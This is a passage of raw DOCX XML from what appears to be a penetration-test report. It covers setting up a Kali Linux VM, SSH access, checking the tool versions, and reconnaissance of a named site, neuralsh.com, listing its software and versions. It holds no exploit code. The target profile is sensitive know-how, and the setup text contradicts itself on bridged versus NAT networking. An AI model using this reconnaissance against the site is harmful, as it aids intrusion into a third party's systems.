              <w:t>Guest OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux 2024.x (64-bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>RAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4 GB allocated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>40 GB virtual disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bridged (enp0s31f6) — shares host network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The network adapter was configured in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bridged mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than NAT. Bridged mode places the Kali VM directly on the physical network, giving it its own IP address and allowing it to reach the internet and the target systems directly without any port forwarding configuration. This mirrors the network conditions of a real external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2834611"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig41_virtualbox.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2834611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.1: VirtualBox showing Kali Linux VM running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.2 SSH Remote Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rather than working directly inside the Kali VM's graphical interface, all testing commands were issued from the host machine's terminal via SSH. This approach is standard in professional engagements and allows the assessor to copy commands, view output, and manage files without switching windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After booting the Kali VM, SSH access was established as follows. The VM network adapter was configured to use NAT mode in VirtualBox, and a port forwarding rule was added (Host port 2222 → Guest port 22) to allow SSH from the host machine:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Start the Kali VM headlessly from host terminal</w:t>
        <w:br/>
        <w:t>VBoxManage startvm "Kali-Pentest" --type headless</w:t>
        <w:br/>
        <w:br/>
        <w:t># Connect via SSH using the NAT port forwarding rule</w:t>
        <w:br/>
        <w:t>ssh -p 2222 kali@127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2074577"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig42_ssh_kali.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2074577"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.2: SSH session from Linux Mint terminal connected to Kali VM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Once SSH was confirmed working, a static IP was assigned to the Kali VM to prevent the address from changing between sessions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># On Kali — edit network config</w:t>
        <w:br/>
        <w:t>sudo nano /etc/network/interfaces</w:t>
        <w:br/>
        <w:t># Set: address 10.0.2.15, netmask 255.255.255.0, gateway 10.0.2.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.3 Tools Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After the environment was configured, all penetration testing tools were verified to be installed and functional. Kali Linux includes the full suite of required tools by default:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Confirm tool availability</w:t>
        <w:br/>
        <w:t>nmap --version        # Nmap 7.95</w:t>
        <w:br/>
        <w:t>nikto -Version        # Nikto 2.1.6</w:t>
        <w:br/>
        <w:t>dirb --help           # DIRB v2.22</w:t>
        <w:br/>
        <w:t>nuclei -version       # Nuclei 3.x</w:t>
        <w:br/>
        <w:t>msfconsole --version  # Metasploit 6.x</w:t>
        <w:br/>
        <w:t>burpsuite             # Burp Suite Community (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1442824"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig43_tools_verify.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1442824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.3: Tool version verification — Nmap, Nikto, Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.2 Target Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>neuralsh.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NeuralShield) is an AI-powered search and neural network platform providing image search, text search, category browsing, geolocation-based features, and report submission via a REST API. The main application is built with Nuxt.js (Vue.js Server-Side Rendering) and protected by Cloudflare's Web Application Firewall (WAF).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2644151"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig44_website.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2644151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.4: neuralsh.com homepage in browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.2.1 Technology Stack</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nuxt.js (Vue.js SSR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CDN / WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Backend Hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shared cPanel hosting (Cloudways / cprapid.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network Equipment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MikroTik RouterOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL 8.0.43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web Server (Backend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Apache httpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail Transfer Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exim 4.99.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail Delivery Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Dovecot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PowerDNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Registrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GoDaddy (privacy via Domains By Proxy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloudflare nameservers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 8: neuralsh.com technology stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.2.2 Infrastructure Map</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Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
